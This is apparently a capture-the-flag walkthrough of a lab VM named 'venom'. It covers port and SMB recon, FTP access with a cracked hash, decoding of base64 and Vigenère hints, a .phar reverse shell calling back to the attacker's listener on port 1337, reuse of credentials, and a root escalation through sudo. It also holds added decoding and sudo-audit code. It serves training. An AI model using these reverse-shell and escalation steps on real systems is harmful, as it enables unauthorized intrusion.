Port scanning with nmap, or you can use recon:

┌──(root@ghost)-[/home/ghost]
└─# recon venom.vuln

[R3C0N] by 0bfxgh0st 4 WWA with ❤

[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-19 13:55 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 13:55
Completed NSE at 13:55, 0.00s elapsed
Initiating ARP Ping Scan at 13:55
Scanning venom.vuln (10.0.2.21) [1 port]
Completed ARP Ping Scan at 13:55, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 13:55
Scanning venom.vuln (10.0.2.21) [65535 ports]
Discovered open port 443/tcp on 10.0.2.21
Discovered open port 21/tcp on 10.0.2.21
Discovered open port 139/tcp on 10.0.2.21
Discovered open port 80/tcp on 10.0.2.21
Discovered open port 445/tcp on 10.0.2.21
Completed SYN Stealth Scan at 13:55, 1.47s elapsed (65535 total ports)
NSE: Script scanning 10.0.2.21.
Initiating NSE at 13:55
Completed NSE at 13:55, 1.00s elapsed
Nmap scan report for venom.vuln (10.0.2.21)
Host is up (0.000059s latency).
Not shown: 65530 closed tcp ports (reset)
PORT    STATE SERVICE
21/tcp  open  ftp
80/tcp  open  http
139/tcp open  netbios-ssn
443/tcp open  https
445/tcp open  microsoft-ds
MAC Address: 08:00:27:16:53:A1 (Oracle VirtualBox virtual NIC)

NSE: Script Post-scanning.
Initiating NSE at 13:55
Completed NSE at 13:55, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.70 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)

[+] [smb]
SMB         venom.vuln      445    VENOM            [*] Windows 6.1 (name:VENOM) (domain:) (signing:False) (SMBv1:True)
[+] Guest session       IP: venom.vuln:445      Name: unknown                                           
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        print$                                                  NO ACCESS       Printer Drivers
        IPC$                                                    NO ACCESS       IPC Service (venom server (Samba, Ubuntu))

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        IPC$            IPC       IPC Service (venom server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

        Server               Comment
        ---------            -------

        Workgroup            Master
        ---------            -------
        WORKGROUP            VENOM
[~] [smb knocker]
[print$]
tree connect failed: NT_STATUS_ACCESS_DENIED
[IPC$]
Current directory is \\venom.vuln\IPC$\
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*

[i] [Server info]
http://venom.vuln:80 [200 OK] Apache[2.4.29], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.0.2.21], Title[Apache2 Ubuntu Default Page: It works]

[+] [fuzzin server]

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Sep 19 13:55:29 2022
URL_BASE: http://venom.vuln:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://venom.vuln:80/ ----
+ http://venom.vuln:80/index.html (CODE:200|SIZE:11004)                                                                                                                                           
+ http://venom.vuln:80/server-status (CODE:403|SIZE:275)                                                                                                                                          
                                                                                                                                                                                                  
-----------------
END_TIME: Mon Sep 19 13:55:31 2022
DOWNLOADED: 4612 - FOUND: 2



[i] [Server info]
http://venom.vuln:443 [200 OK] Apache[2.4.29], Country[RESERVED][ZZ], HTTPServer[Ubuntu Linux][Apache/2.4.29 (Ubuntu)], IP[10.0.2.21], Title[Apache2 Ubuntu Default Page: It works]

[+] [fuzzin server]

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Mon Sep 19 13:55:32 2022
URL_BASE: http://venom.vuln:443/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://venom.vuln:443/ ----
+ http://venom.vuln:443/index.html (CODE:200|SIZE:11004)                                                                                                                                          
+ http://venom.vuln:443/server-status (CODE:403|SIZE:276)                                                                                                                                         
                                                                                                                                                                                                  
-----------------
END_TIME: Mon Sep 19 13:55:33 2022
DOWNLOADED: 4612 - FOUND: 2

recon reports five open ports (21, 80, 139, 443 and 445). The source of the default page on port 80 contains a comment:

┌──(root@ghost)-[/home/ghost]
└─# curl http://venom.vuln/
...
<!...<5f2a66f947fa5690c26506f66bde5c23> follow this to get access on somewhere.....-->

After cracking this MD5 hash we obtain hostinger, which we use to log in over FTP.

┌──(root@ghost)-[/home/ghost]
└─# ftp venom.vuln
Connected to venom.vuln.
220 (vsFTPd 3.0.3)
Name (venom.vuln:ghost): hostinger
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls -la
229 Entering Extended Passive Mode (|||44978|)
150 Here comes the directory listing.
dr-xr-xr-x    3 65534    65534        4096 May 20  2021 .
dr-xr-xr-x    3 65534    65534        4096 May 20  2021 ..
drwxr-xr-x    2 1002     1002         4096 May 21  2021 files
226 Directory send OK.
ftp> cd files
250 Directory successfully changed.
ftp> ls -la
229 Entering Extended Passive Mode (|||46514|)
150 Here comes the directory listing.
drwxr-xr-x    2 1002     1002         4096 May 21  2021 .
dr-xr-xr-x    3 65534    65534        4096 May 20  2021 ..
-rw-r--r--    1 0        0             384 May 21  2021 hint.txt
226 Directory send OK.
ftp> get hint.txt
local: hint.txt remote: hint.txt
229 Entering Extended Passive Mode (|||45702|)
150 Opening BINARY mode data connection for hint.txt (384 bytes).
100% |******************************************************************************************************************************************************|   384       18.15 KiB/s    00:00 ETA
226 Transfer complete.
384 bytes received in 00:00 (17.63 KiB/s)
ftp> exit
221 Goodbye.
┌──(root@ghost)-[/home/ghost]
└─# cat hint.txt
        Hey there... 

T0D0 --

* You need to follow the 'hostinger' on WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0= also aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI=
* some knowledge of cipher is required to decode the dora password..
* try on venom.box
password -- L7f9l8@J#p%Ue+Q1234 -> decode this you will get the administrator password 


Have fun .. :)
┌──(root@ghost)-[/home/ghost]
└─# echo WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0= | base64 -d | base64 -d | base64 -d
standard vigenere cipher
┌──(root@ghost)-[/home/ghost]
└─# echo aHR0cHM6Ly9jcnlwdGlpLmNvbS9waXBlcy92aWdlbmVyZS1jaXBoZXI= | base64 -d
https://cryptii.com/pipes/vigenere-cipher

Both encoded hints decode as shown above. Following them and using hostinger as the Vigenère key, we obtain the password E7r9t8@Q#h%Hy+M1234. We add venom.box to /etc/hosts; inspecting the source code of http://venom.box leads us to http://venom.box/panel/, where we can log in as dora with the decrypted password.
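The two decoding steps above, written out as an added example (not part of the original write-up): `peel_base64` strips nested base64 layers and `vigenere_decrypt` applies the standard Vigenère rule, where only letters are shifted and only letters consume a key character. The function names are hypothetical; the inputs are the strings from hint.txt.

```python
import base64
import string

def peel_base64(text, max_layers=10):
    """Decode nested base64 until the result is no longer valid base64 text.

    Returns (decoded_text, layers_removed). A plaintext that happens to be
    valid base64 itself would be peeled one layer too far, so check the count.
    """
    layers = 0
    while layers < max_layers:
        try:
            text = base64.b64decode(text, validate=True).decode("ascii")
        except ValueError:  # binascii.Error and UnicodeDecodeError derive from it
            break
        layers += 1
    return text, layers

def vigenere_decrypt(ciphertext, key):
    """Standard Vigenere: digits and symbols pass through and do not advance the key."""
    shifts = [string.ascii_lowercase.index(k) for k in key.lower()]
    out, used = [], 0
    for ch in ciphertext:
        if ch.isascii() and ch.isalpha():
            base = ord("A") if ch.isupper() else ord("a")
            shift = shifts[used % len(shifts)]
            out.append(chr((ord(ch) - base - shift) % 26 + base))
            used += 1
        else:
            out.append(ch)
    return "".join(out)

if __name__ == "__main__":
    # Strings taken from hint.txt above
    hint = "WXpOU2FHSnRVbWhqYlZGblpHMXNibHBYTld4amJWVm5XVEpzZDJGSFZuaz0="
    print(peel_base64(hint))
    print(vigenere_decrypt("L7f9l8@J#p%Ue+Q1234", "hostinger"))
```

Neither step involves a secret beyond the key that the page comment already leaked, which is why the "encrypted" administrator password offers no protection once hint.txt is readable.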

┌──(root@ghost)-[/home/ghost]
└─# shellstorm.sh php-daemon 10.0.2.15 1337 > rev.phar

This creates our .phar reverse shell.

Now we navigate to http://venom.box/panel/uploads/ and upload the shell. Then we start a netcat listener and execute the shell at http://venom.box/uploads/rev.phar

┌──(root@ghost)-[/home/ghost]
└─# nc -lvp 1337
listening on [any] 1337 ...
connect to [10.0.2.15] from venom.box [10.0.2.21] 48664
Linux venom 5.4.0-42-generic #46~18.04.1-Ubuntu SMP Fri Jul 10 07:21:24 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 00:23:03 up  1:01,  0 users,  load average: 0.03, 0.01, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ python -c "import pty; pty.spawn('/bin/bash')"
www-data@venom:/$ cat /etc/passwd | grep -e 'sh$'
root:x:0:0:root:/root:/bin/bash
nathan:x:1000:1000:nathan,,,:/home/nathan:/bin/bash
hostinger:x:1002:1002:,,,:/home/hostinger:/bin/bash
www-data@venom:/$ su hostinger
su hostinger
Password: hostinger

hostinger@venom:/$ cd /var/www/html/subrion/backup/
hostinger@venom:/var/www/html/subrion/backup$ ls -la
ls -la
total 12
drwxr-xr-x  2 www-data www-data 4096 May 21  2021 .
drwxr-xr-x 13 www-data www-data 4096 May 21  2021 ..
-rwxr-xr-x  1 www-data www-data   81 May 21  2021 .htaccess
hostinger@venom:/var/www/html/subrion/backup$ cat .htaccess
cat .htaccess
allow from all
You_will_be_happy_now :)
FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a

The hostinger:hostinger credentials were reused for the local account, and the .htaccess file gave us the string FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a. Let's try it as nathan's password.

hostinger@venom:/var/www/html/subrion/backup$ su nathan
su nathan
Password: FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a

nathan@venom:/var/www/html/subrion/backup$ cd /home/nathan
nathan@venom:~$ cat user.txt
cat user.txt
W3_@r3_V3n0m:P

nathan@venom:~$ sudo -l
[sudo] password for nathan: FzN+f2-rRaBgvALzj*Rk#_JJYfg8XfKhxqB82x_a

Matching Defaults entries for nathan on venom:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nathan may run the following commands on venom:
    (root) ALL, !/bin/su
    (root) ALL, !/bin/su
nathan@venom:~$ sudo -u root bash
root@venom:~# cat /root/root.txt
#root_flag
H@v3_a_n1c3_l1fe.
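The `(root) ALL, !/bin/su` rule is why the last step works: subtracting a command from `ALL` with `!` does not restrict anything, because any other program run as root (here `bash`) gives the same result. The following audit check is an added example, not part of the original write-up; `audit_sudo_l` is a hypothetical helper that flags such rules in `sudo -l` output, and the sample is the rule listing from the session above.

```python
import re

# Rule line as printed by `sudo -l`: "(runas) [TAG: ...] cmd, cmd, ..."
RULE = re.compile(
    r"^\s*\((?P<runas>[^)]*)\)\s*(?P<tags>(?:[A-Z_]+:\s*)*)(?P<cmds>.+)$"
)

def audit_sudo_l(output):
    """Return one finding per distinct rule that grants ALL and negates commands."""
    findings, seen = [], set()
    for line in output.splitlines():
        m = RULE.match(line)
        if not m:
            continue  # headers, Defaults entries, blank lines
        cmds = [c.strip() for c in m.group("cmds").split(",")]
        negated = [c[1:].strip() for c in cmds if c.startswith("!")]
        key = (m.group("runas"), tuple(cmds))
        if "ALL" in cmds and negated and key not in seen:
            seen.add(key)  # sudo -l can print the same rule more than once
            findings.append({
                "runas": m.group("runas"),
                "negated": negated,
                "rule": line.strip(),
            })
    return findings

# Rule listing copied from the `sudo -l` session above
SAMPLE = """\
User nathan may run the following commands on venom:
    (root) ALL, !/bin/su
    (root) ALL, !/bin/su
"""

if __name__ == "__main__":
    for f in audit_sudo_l(SAMPLE):
        print(f"ineffective deny-list as {f['runas']}: {f['rule']} "
              f"(negated: {', '.join(f['negated'])})")
```

The fix is an allow-list: grant only the specific commands the account needs instead of `ALL` minus exceptions.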